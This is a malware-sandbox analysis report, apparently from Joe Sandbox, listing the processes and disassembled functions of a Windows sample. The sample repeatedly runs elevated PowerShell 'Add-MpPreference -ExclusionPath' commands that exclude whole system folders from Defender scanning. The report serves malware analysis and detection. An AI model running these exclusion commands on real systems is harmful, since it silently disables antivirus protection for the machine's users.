                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:61
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:62
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:63
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:64
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:65
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:66
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:67
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:68
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:69
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:70
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:71
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:72
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:73
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:74
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:75
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:76
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:77
                                                                                        Start time:12:08:24
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:78
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:79
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:80
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:81
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                        Imagebase:0x7ff788560000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:82
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:83
                                                                                        Start time:12:08:25
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:84
                                                                                        Start time:12:08:36
                                                                                        Start date:08/01/2025
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff6eef20000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.3%
                                                                                          Dynamic/Decrypted Code Coverage:85.7%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:14
                                                                                          Total number of Limit Nodes:1
                                                                                          execution_graph 21413 7ffd9ba4f0f4 21414 7ffd9ba4f12b ResumeThread 21413->21414 21416 7ffd9ba4f204 21414->21416 21426 7ffd9ba4d93d 21427 7ffd9ba4d94b SuspendThread 21426->21427 21429 7ffd9ba4da24 21427->21429 21417 7ffd9ba50f4f 21418 7ffd9ba50f6f GetFileAttributesW 21417->21418 21420 7ffd9ba51035 21418->21420 21421 7ffd9ba4f259 21423 7ffd9ba4f267 21421->21423 21422 7ffd9ba4f24b 21423->21422 21424 7ffd9ba4f2df CloseHandle 21423->21424 21425 7ffd9ba4f344 21424->21425

                                                                                          Executed Functions

                                                                                          Function 00007FFD9B890D68 Relevance: .3, Instructions: 277COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 076e713cefbc0ba443af1926baa948b5fb7cb5092da932b235c1208e6d8abb8f
                                                                                          • Instruction ID: 24aa7de28495dd07c3bff21f3e5e2bb9af930fb04ddd479cee65380fc3dee7f1
                                                                                          • Opcode Fuzzy Hash: 076e713cefbc0ba443af1926baa948b5fb7cb5092da932b235c1208e6d8abb8f
                                                                                          • Instruction Fuzzy Hash: 4CA1ED71A19A8D8FEB99DF68C8657A9BFE1FB59300F4401BED089D72D2CB782901C741
                                                                                          Function 00007FFD9BA4F0F4 Relevance: 1.7, APIs: 1, Instructions: 160threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: b9b69696ea68bc768bb878f1f65dd8931cc816120a865c65e7040fd6a96bcda3
                                                                                          • Instruction ID: deedbb54b6b54a5c59dec1c559f7258a3202f5bfce8c94307bb459ea646f0f06
                                                                                          • Opcode Fuzzy Hash: b9b69696ea68bc768bb878f1f65dd8931cc816120a865c65e7040fd6a96bcda3
                                                                                          • Instruction Fuzzy Hash: 11517A7090C78C8FDB59DFA8D854AE9BFF0EF5A310F1441ABD049DB2A2DA759846CB01
                                                                                          Function 00007FFD9BA4D93D Relevance: 1.6, APIs: 1, Instructions: 139threadinjectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 11 7ffd9ba4d93d-7ffd9ba4d949 12 7ffd9ba4d954-7ffd9ba4da22 SuspendThread 11->12 13 7ffd9ba4d94b-7ffd9ba4d953 11->13 16 7ffd9ba4da24 12->16 17 7ffd9ba4da2a-7ffd9ba4da74 12->17 13->12 16->17
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: SuspendThread
                                                                                          • String ID:
                                                                                          • API String ID: 3178671153-0
                                                                                          • Opcode ID: 9cc032ce37ee48f4272b148e465fc9f3ff460e237e4a134d7b199e45998f12ba
                                                                                          • Instruction ID: f686e5b2b64eabad27506785fbbfb676aefb3da7e2cb1a2588e6de49f002bbeb
                                                                                          • Opcode Fuzzy Hash: 9cc032ce37ee48f4272b148e465fc9f3ff460e237e4a134d7b199e45998f12ba
                                                                                          • Instruction Fuzzy Hash: 1B414B70D0864D8FDB98DF98D894AEDBBF0EB5A310F10416AD049E7292DA70A886CF40
                                                                                          Function 00007FFD9BA50F4F Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 20 7ffd9ba50f4f-7ffd9ba51033 GetFileAttributesW 24 7ffd9ba5103b-7ffd9ba51079 20->24 25 7ffd9ba51035 20->25 25->24
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 68e879e1ffb1f6004e0ca7469fc2043432b0505fe702d81a2a35da854e15743b
                                                                                          • Instruction ID: 717ac37b05ece12777ff226a8c999e472bafe99bf1f7c12025aa816f629a508a
                                                                                          • Opcode Fuzzy Hash: 68e879e1ffb1f6004e0ca7469fc2043432b0505fe702d81a2a35da854e15743b
                                                                                          • Instruction Fuzzy Hash: A0414970E0864C8FDB98DF98D895BEDBBF0EB5A310F1041AED049E7252DA74A885CF40
                                                                                          Function 00007FFD9BF9EA28 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: 04ee0d6aadbebe27540e879060ffa170fdda9380f1a19778f34b0ea0ecfd1bf7
                                                                                          • Instruction ID: 843a690a149d9f3cf41811b5b17f5dbe1369ad56b65590a674069b6d489ce052
                                                                                          • Opcode Fuzzy Hash: 04ee0d6aadbebe27540e879060ffa170fdda9380f1a19778f34b0ea0ecfd1bf7
                                                                                          • Instruction Fuzzy Hash: A3517231E0964E8FEB59DF98D4605FCB7B1FF54300F2141BAC01AE72A6CA396A05CB40
                                                                                          Function 00007FFD9BF928E8 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2143335975.00007FFD9BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BF90000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9bf90000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: d372791804d9d8e308b9ba5ef3da3bda664cde7ea03c9190de8476a503d81e21
                                                                                          • Instruction ID: 209efe6d871d43bf4ada8a6385dda58faf31c8d7ca9e9636f6591158561fc281
                                                                                          • Opcode Fuzzy Hash: d372791804d9d8e308b9ba5ef3da3bda664cde7ea03c9190de8476a503d81e21
                                                                                          • Instruction Fuzzy Hash: D2513831E0964E8FDB6CDFD8C4A45ADB7B1FF58300F1141AAC45AE72A2DA356A42CB40
                                                                                          Function 00007FFD9BA4F259 Relevance: 1.4, APIs: 1, Instructions: 153COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1949148282.00007FFD9BA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9ba40000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 9ea73733970e482aacefbe39a9942b886e80ee4ba956b852a49aa9c387a108ee
                                                                                          • Instruction ID: 83ba4f5450219bf3aa33c069bb9dacfdf5e3fa06bc230b19b99ea668bc2d3012
                                                                                          • Opcode Fuzzy Hash: 9ea73733970e482aacefbe39a9942b886e80ee4ba956b852a49aa9c387a108ee
                                                                                          • Instruction Fuzzy Hash: 7A416A70A0874C8FDB59DFA8D895BECBBF0FF16310F1041AAD049D7292DA75A886CB41
                                                                                          Function 00007FFD9B899564 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1911790532.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd9b890000_3XtEci4Mmo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P
                                                                                          • API String ID: 0-3110715001
                                                                                          • Opcode ID: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction ID: 48c2e2edd60181b912fe8859379d2f90239cd0bf237a8c79d78c26f4c35e3afe
                                                                                          • Opcode Fuzzy Hash: b1ce6d5685ecb5856ac026e867556c8bd9cf24b350935c1720020e677fba9d85
                                                                                          • Instruction Fuzzy Hash: 02210E70E1595D8EEB74EB54CC987E9B7B1EB88306F1002E9C50DA62A1CB741AC58F44
                                                                                          Function 00007FFD9BF9AD10 Relevance: .7, Instructions: 692COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 132 7ffd9bf9ad10-7ffd9bf9ad2a 133 7ffd9bf9b32c-7ffd9bf9b33a 132->133 134 7ffd9bf9ad30-7ffd9bf9ad40 132->134 135 7ffd9bf9b33c 133->135 136 7ffd9bf9b341-7ffd9bf9b350 133->136 137 7ffd9bf9ad46-7ffd9bf9ad81 134->137 138 7ffd9bf9b38a-7ffd9bf9b3a0 134->138 135->136 143 7ffd9bf9ae1a-7ffd9bf9ae22 137->143 141 7ffd9bf9b3ea-7ffd9bf9b3fd 138->141 142 7ffd9bf9b3a2-7ffd9bf9b3c6 138->142 144 7ffd9bf9ad86-7ffd9bf9ad8f 143->144 145 7ffd9bf9ae28 143->145 144->138 147 7ffd9bf9ad95-7ffd9bf9ada0 144->147 146 7ffd9bf9ae32-7ffd9bf9ae4f 145->146 150 7ffd9bf9ae56-7ffd9bf9ae67 146->150 148 7ffd9bf9ada6-7ffd9bf9adba 147->148 149 7ffd9bf9ae2a-7ffd9bf9ae2e 147->149 151 7ffd9bf9adbc-7ffd9bf9add3 148->151 152 7ffd9bf9ae13-7ffd9bf9ae17 148->152 149->146 158 7ffd9bf9ae69-7ffd9bf9ae7e 150->158 159 7ffd9bf9ae80-7ffd9bf9ae8f 150->159 151->138 153 7ffd9bf9add9-7ffd9bf9ade5 151->153 152->143 154 7ffd9bf9ade7-7ffd9bf9adfb 153->154 155 7ffd9bf9adff-7ffd9bf9ae10 153->155 154->151 157 7ffd9bf9adfd 154->157 155->152 157->152 158->159 162 7ffd9bf9aeb1-7ffd9bf9aede 159->162 163 7ffd9bf9ae91-7ffd9bf9aeac 159->163 167 7ffd9bf9aee0-7ffd9bf9aef5 162->167 168 7ffd9bf9aedf 162->168 170 7ffd9bf9b2e9-7ffd9bf9b309 163->170 167->168 175 7ffd9bf9aef7-7ffd9bf9af1e 167->175 168->167 176 7ffd9bf9b30d-7ffd9bf9b31a 170->176 180 7ffd9bf9af20-7ffd9bf9af33 175->180 181 7ffd9bf9af6f-7ffd9bf9af83 175->181 177 7ffd9bf9b31c-7ffd9bf9b326 176->177 177->134 179 7ffd9bf9b32b 177->179 179->133 180->138 182 7ffd9bf9af39-7ffd9bf9af60 180->182 184 7ffd9bf9af85-7ffd9bf9af90 181->184 185 7ffd9bf9af62-7ffd9bf9af67 181->185 182->185 188 7ffd9bf9af98-7ffd9bf9afb6 184->188 187 7ffd9bf9af68-7ffd9bf9af6d 185->187 187->180 189 7ffd9bf9af6e 187->189 191 7ffd9bf9afba-7ffd9bf9afc0 188->191 189->181 192 7ffd9bf9afca-7ffd9bf9afdb 191->192 193 7ffd9bf9b04c-7ffd9bf9b05d 192->193 194 7ffd9bf9afdd-7ffd9bf9afe1 192->194 195 7ffd9bf9b05e-7ffd9bf9b061 193->195 194->187 197 7ffd9bf9afe3 194->197 198 7ffd9bf9b067-7ffd9bf9b06b 195->198 199 7ffd9bf9b00c-7ffd9bf9b01d 197->199 200 7ffd9bf9b06d-7ffd9bf9b06f 198->200 199->198 208 7ffd9bf9b01f-7ffd9bf9b02d 199->208 201 7ffd9bf9b0b9-7ffd9bf9b0c1 200->201 202 7ffd9bf9b071-7ffd9bf9b07f 200->202 206 7ffd9bf9b10b-7ffd9bf9b113 201->206 207 7ffd9bf9b0c3-7ffd9bf9b0cc 201->207 204 7ffd9bf9b0f0-7ffd9bf9b105 202->204 205 7ffd9bf9b081-7ffd9bf9b085 202->205 204->206 205->199 215 7ffd9bf9b087 205->215 210 7ffd9bf9b119-7ffd9bf9b132 206->210 211 7ffd9bf9b19b-7ffd9bf9b1a9 206->211 212 7ffd9bf9b0cf-7ffd9bf9b0d1 207->212 213 7ffd9bf9b09e-7ffd9bf9b0b3 208->213 214 7ffd9bf9b02f-7ffd9bf9b033 208->214 210->211 216 7ffd9bf9b134-7ffd9bf9b135 210->216 217 7ffd9bf9b21a-7ffd9bf9b21b 211->217 218 7ffd9bf9b1ab-7ffd9bf9b1ad 211->218 219 7ffd9bf9b142-7ffd9bf9b144 212->219 220 7ffd9bf9b0d3-7ffd9bf9b0d5 212->220 213->201 214->191 224 7ffd9bf9b035 214->224 215->213 226 7ffd9bf9b136-7ffd9bf9b141 216->226 225 7ffd9bf9b24b-7ffd9bf9b24d 217->225 227 7ffd9bf9b229-7ffd9bf9b22b 218->227 228 7ffd9bf9b1af 218->228 239 7ffd9bf9b145-7ffd9bf9b147 219->239 222 7ffd9bf9b0d7 220->222 223 7ffd9bf9b151-7ffd9bf9b155 220->223 222->195 230 7ffd9bf9b0d9 222->230 231 7ffd9bf9b157 223->231 232 7ffd9bf9b1d1-7ffd9bf9b1eb 223->232 224->193 233 7ffd9bf9b2be-7ffd9bf9b2e7 225->233 234 7ffd9bf9b24f 225->234 226->219 235 7ffd9bf9b1bd 226->235 236 7ffd9bf9b29c 227->236 237 7ffd9bf9b22d-7ffd9bf9b22f 227->237 228->226 238 7ffd9bf9b1b1 228->238 240 7ffd9bf9b0de-7ffd9bf9b0e4 230->240 231->240 241 7ffd9bf9b159 